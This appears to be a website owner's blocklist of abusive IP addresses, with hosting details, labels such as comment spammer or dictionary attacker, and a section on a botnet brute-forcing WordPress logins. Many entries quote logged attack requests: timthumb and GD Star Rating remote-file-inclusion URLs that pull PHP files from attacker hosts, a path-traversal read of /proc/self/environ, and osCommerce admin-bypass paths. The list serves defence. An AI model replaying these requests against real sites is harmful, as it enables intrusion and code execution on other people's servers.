Company: United States – San Antonio Rackspace Hosting
Attempted timthumb exploit:
/wp-content/themes/primely-theme/scripts/timthumb.php?src=http%3A%2F%2Fwordpress.com.slotscasino-online.com/ozawa.php
212.66.34.43 Hostnames: mshayem.com
lookmy2.ints.net
Company: Ukraine – Donets’k Data Internet Ltd
Comment Spammer
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?src=http: //picasa.com.thecleanhouse.cl/google.php
216.152.249.243 Company: United States – Santa Monica Xeex Comment Spammer
[ARTICLE URL]/%2B/%22add%2Bwebsite/%22%2B%2B%2Bgeneration&ct=clnk
/wp-comments-post.php
208.131.138.19 Hostname: aaa1.buyalot.cn
Company: United States – New York City Westhost Inc.
Comment Spammer
93.182.134.194 Hostname: anon-134-194.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer
Found Honeypot Trap file
ANOTHER relakks.com host BAD IP
189.15.122.187 Hostname: 189-015-122-187.xd-dynamic.ctbcnetsuper.com.br
Company: Brazil – Sao Paulo Companhia De Telecomunicacoes Do Brasil Central
UA: UA: gsa-crawler (Enterprise; GID-01422; jplastiras.com)
Mail Server / Dictionary Attacker
Attempted WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=shell.php
198.24.138.51 Company: United States – Phoenix Secured Servers Llc Comment Spammer
Found Honeypot Trap file
ANOTHER Phoenix Secured Servers Llc BAD IP
80.81.183.2 Hostname: dl17.ymgg.us
Company: Finland – Helsinki Elisa Oyj
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
91.194.72.17 see next Hostname: cpanel.onetelecom.od.ua
Company: Ukraine Odessa One Telecom Ltd
Suspected attempt to attack database
[DOMAIN]/dump
94.23.246.109 Hostname: ks367729.kimsufi.com
Company: France Roubaix Ovh Sas
Daily attempt on wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
173.0.137.76 Company: United States – Orlando Apyl Inc Mail server, Dictionary attacke, Bad web host
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/file_manager.php/login.php
192.119.144.68 Company: United States – Dallas Paige Chen Comment Spammer
108.171.255.203 Hostname: unassigned.psychz.net
Company:United States – New York City Psychz Networks
Comment Spammer
146.185.18.82 Hostname: customer.golifeinsurancepro.com
Company: United Kingdom – London Hosting Services Inc
Attempting uploadify exploit –
from folder requests this looks like an attack against Drupal
/modules/pm_advancedsearch4/js/uploadify/uploadify.css?
/js/jquery.uploadify-v2.1.0/uploadify.css?
/scripts/uploadify/uploadify.css?
182.132.74.122 Company: China – Chengdu Chinanet Sichuan Province Network
UA: Python-urllib/2.7
PHP Hack attempt:
/phpMyAdmin/scripts/setup.php
91.231.40.27 Company: Ukraine – Rivne Fop Chaliy Igor Petrovich Comment Spammer
108.171.246.242 Hostname: b2-10.unixbsd.info
Company: United States – New York City Psychz Networks
Hacker:
/include/config.php../../../../../../../../../../../../../../../../../../../../../../../..//
proc/self/environ%0000
Mail Server
BAD HOST
74.200.83.241 Hostname: unknown241.83.200.74.defenderhosting.com
Company: United States – Ashburn Virtacore Systems Inc
Hacker:
/include/config.php../../../../../../../../../../../../../../../../../../../../../../../..
//proc/self/environ%0000
198.24.138.52 Company: United States – Phoenix Secured Servers Llc Comment Spammer
Found Honeypot Trap file
BAD HOST: Phoenix Secured Servers Llc
216.99.157.202 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Probing for folder contents – URL/index.php
Comment Spammer
61.135.242.229 see next Company: China Beijing Cea Edu Attempted admin hack:
/phpMyAdmin/scripts/setup.php
Mail Server, Dictionary Attacker, Comemnt Spammer
221.206.105.219 Company: China Harbin China Unicom Heilongjiang Province Network Comemnt Spammer
85.25.143.216 Hostname: golfmail.digital-worx.de
Company: Germany Frankfurt Am Main Intergenia Ag
Attempted timthumb exploit:
/wp-content/themes/blacklabel/framework/timthumb.php?src=
//wp-content/themes/blacklabel/framework/timthumb.php?
src=http: //wordpress.com.sexdraw.com/cgi-bin.php
91.149.157.131 Hostname: vh29.hoster.by
Company: Belarus Minsk Mobile Service Ltd.
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php?
src=http: //wordpress.com.nurqaseh.org/cur.php
142.0.131.145 Company: China Anxin Comment Spammer
41.249.8.30 Company: Morocco Rabat Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Mail Server, Dictionary Attacker, Comment Spammer
213.187.93.27 Hostname: serv38.loswebos.de
Company: Germany – Leipzig Hl Komm Telekommunikations Gmbh
Attempted WordPress GD Star Rating plugin and timthumb exploit
/wp-content/gd-star-rating/thumb.php?
src=http %3A%2F%2Fflickr.com.jpginnovations.com%2Fbad.php
121.251.254.213 Company: China – Qingdao University Of Petroleum (east China) Qingdao Campus Comment Spammer
Found Honeypot Trap files
69.147.240.50 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Trying to register on restricted site
189.27.185.185 Hostname: 189.27.185.185.dynamic.adsl.gvt.net.br
Company: Brazil – Sao Paulo Global Village Telecom
Looking for /mobiquo/mobiquo.php
81.203.104.242 Hostname: 81.203.104.242.dyn.user.ono.com
Company: Spain – Basauri Cableuropa S.a.u.
Mail Server
Comment Spammer:
direct request for /wp-comments-post.php
93.152.163.173 Hostname: 93-152-163-173.ddns.onlinedirect.bg
Company: Bulgaria – Sofia Online Direct Ltd
Mail Server
Tried to register on restricted site
173.212.198.45 Hostname: 173-212-199-45.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Known UAs:
Mozilla/5.0 usww.com-Spider-for-w8.net
Mozilla/5.0 (compatible; BanBots/2.0b; Fetch; +http: //www.banbots.com)
Comment Spammer.
direct request for /wp-comments-post.php
Faked referrer
208.100.18.217 Hostname: 173-212-199-45.hostnoc.net
Company: United States – Chicago Steadfast Networks
Tried to register on restricted site
147.255.128.232 Hostname: 147.255.128.232.rdns.ubiquity.io
Company: United States – Cheyenne Cloudradium L.l.c
Tried to register on restricted site
/forum/user/register
216.152.252.43 Hostname: unknown.xeex.net
Company: United States – Santa Monica Xeex
Comment Spammer
219.234.82.63 Company: China – Beijing Beijing New-billion Telecom Technology Co. Ltd Tried to register on restricted site
/user/register
210.22.73.146 Company: China – Shanghai Ziyuwangluo Tried to register on restricted site
/user/register
217.64.195.242 Hostname: w-14.th.seeweb.it
Company: Italy Frosinone Seeweb S.r.l.
Attempted timthumb exploit:
/wordpress-timthumb-files-updated/wp-content/
plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?
src=http%3A%2F%2Fflickr.com.beatmaking-soft
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php
?src=http: //flickr.com.mercadodecorotos.com/index.php
173.166.213.185 Hostname: 173-166-213-185-memphis.hfc.comcastbusiness.net
Company: United States Meridian Private Customer
Comment Spammer.
direct request for /wp-comments-post.php
no referrer
125.160.44.126 Hostname: 126.subnet125-160-44.speedy.telkom.net.id
Company: Indonesia – Balikpapan Pt Telkom Indonesia
Mail Server, Dictionary Attacker
Tried to register on restricted site
/user/register
/?q=user/register
194.71.224.71 Company: Sweden – Stockholm Resilans Ab Tried to register on restricted site
/user/register
/?q=user/register
64.87.61.214 Hostname: 64.87.61.214.rdns.ubiquityservers.com
Company: United States Grand Prairie Colocateusa
Tried to register on restricted site
/user/register
/?q=user/register
218.25.59.1 Company: China – Shenyang China Unicom Liaoning Province Network Comment Spammer
Found Honeypot Trap file
187.45.250.69 Hostname: l50cnn0632.locaweb.com.br
Company: Brazil – Sao Paulo Locaweb Servicos De Internet S/a
Attempted timthumb exploit:
/wp-content/plugins/cms-pack/timthumb.php?
src=http: //img.youtube.com.toptutor.hk/upload.php
46.45.169.54 Hostname: 46-45-169-54.turkrdns.com
Company: Turkey – Istanbul Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti.
Attempted timthumb exploit:
/wp-content/plugins/cms-pack/timthumb.php?
src=http: //img.youtube.com.toptutor.hk/upload.php
91.142.223.17 Hostname: excesomedia.vservers.es
Company: Spain – Malaga Axarnet Comunicaciones Sl
Attempted wpOnlineStore/osCommerce/Zencart exploit – Brute Force attack
/admin/banner_manager.php/login.php
/security/admin/file_manager.php/login.php
/admin/file_manager.php/login.php
/admin/categories.php/login.php
112.78.183.96 Company: Indonesia Jakarta Cloud Computing Biznet Attempted wpOnlineStore/osCommerce/Zencart exploit – Brute Force attack
/admin/banner_manager.php/login.php
/security/admin/file_manager.php/login.php
/admin/file_manager.php/login.php
/admin/categories.php/login.php
173.242.119.7 Company: United States – Scranton Volumedrive Comment Spammer
Tried to register on restricted site
/user/register
/?q=user/register
109.104.88.243 Hostname: ds7962.dedicated.turbodns.co.uk
Company: United Kingdom Derby Webfusion Internet Solutions
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?
src=http: //blogger.com.apishmedya.com/scan/eidraw.php
222.231.0.163 Company: Korea, Republic Of – Seoul Korea Internet Data Center Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/categories.php/login.php
190.187.3.203 Company: Peru – Lima Americatel Peru S.a. Spam Harvester
Crawling for contact forms and forums
8.8.244.236 Company: United States – Omaha Level 3 Communications Inc. Tried to register on restricted site
/user/register
/?q=user/register
219.137.253.86 Hostname: 86.253.137.219.broad.gz.gd.dynamic.163data.com.cn
Company: China – Guangzhou Chinanet Guangdong Province Network
Trying to register on restricted site
/blogs/load/recent
/index.php/forums/member/register
/register.php
/join.php
/account/register.php
/ucp.php?mode=register
/?page=login&cmd=register
/wp-login.php?action=register
/?s=Register
/tiki-register.php
199.102.44.41 Company: United States Shirley H4y Technologies Llc Comment Spammer
Tried to register on restricted site
/user/register
/?q=user/register
91.215.216.37 Hostname: sky.icnhost.net
Company: Bulgaria – Plovdiv Internet Corporated Networks Ltd.
Mail Server
208.131.138.208 Hostname: 208.131.138.208.static.westdc.net
Company: United States New York City Westhost Inc.
Comment Spammer
204.16.241.28 Hostname: faucet.digitalpipes.com
Company: United States – Pittsburgh Teraswitch Networks Inc.
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php
?src=http: //img.youtube.com.toptutor.hk/upload.php
168.144.48.162 Hostname: vps-1024909-1835.manage.myhosting.com
Company: Canada – Toronto Softcom Technology Consulting Inc.
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php
?src=http: //img.youtube.com.toptutor.hk/upload.php
72.3.227.240 Hostname: www DOT mcompany.com
Company: United States – San Antonio Rackspace Host Routes
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php
?src=http: //img.youtube.com.toptutor.hk/upload.php

BOTNET or HACKER GROUP

The following IP’s were used simultaneously in brute-force/dictionary attacks on WordPress login:

Consider this botnet extremely dangerous

62.162.6.11 Registrar: Macedonia – The Former Yugoslav Republic Of Skopje Makedonski Telekom Comment spammer – trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
190.223.53.70 Registrar: Peru Lima America Movil Peru S.a.c. Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
202.70.136.158 Registrar: Indonesia Jakarta Departemen Kesehatan Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
189.200.157.74 Hostname: customer-mred-74.static.metrored.net.mx
Registrar: Mexico – Mexico City Mexico Red De Telecomunicaciones S. De R.l. De C.v
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
190.95.206.254 Hostname: mail.coop23dejulio.fin.ec
Registrar: Ecuador – Guayaquil Telconet S.a
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
190.211.243.50 Hostname: newhost50.teisa.com.py Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
62.33.168.214 Hostname: 214.168.33.62.sekrd.ru
Registrar: Russian Federation – Moscow Transtelecom
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
RANGE 62.33.167.0 – 62.33.168.255 (RUSSIA) Banned
212.48.35.55 Registrar: Russian Federation – Moscow Mts Ojsc Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
RANGE 212.48.35.48 – 212.48.35.63 (RUSSIA) Banned
61.30.127.2 Hostname: 61-30-127-2.static.tfn.net.tw
Registrar: Taiwan Taipei Taiwan Fixed Network Co. Ltd.
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
151.237.184.110 Company: Sweden – Stockholm Deepak Mehta Fie Comment Spammer
81.44.245.224 Hostname: 224.Red-81-44-245.dynamicIP.rima-tde.net
Company: Spain – Madrid Telefonica De Espana Sau
Comment Spammer
%d bloggers like this: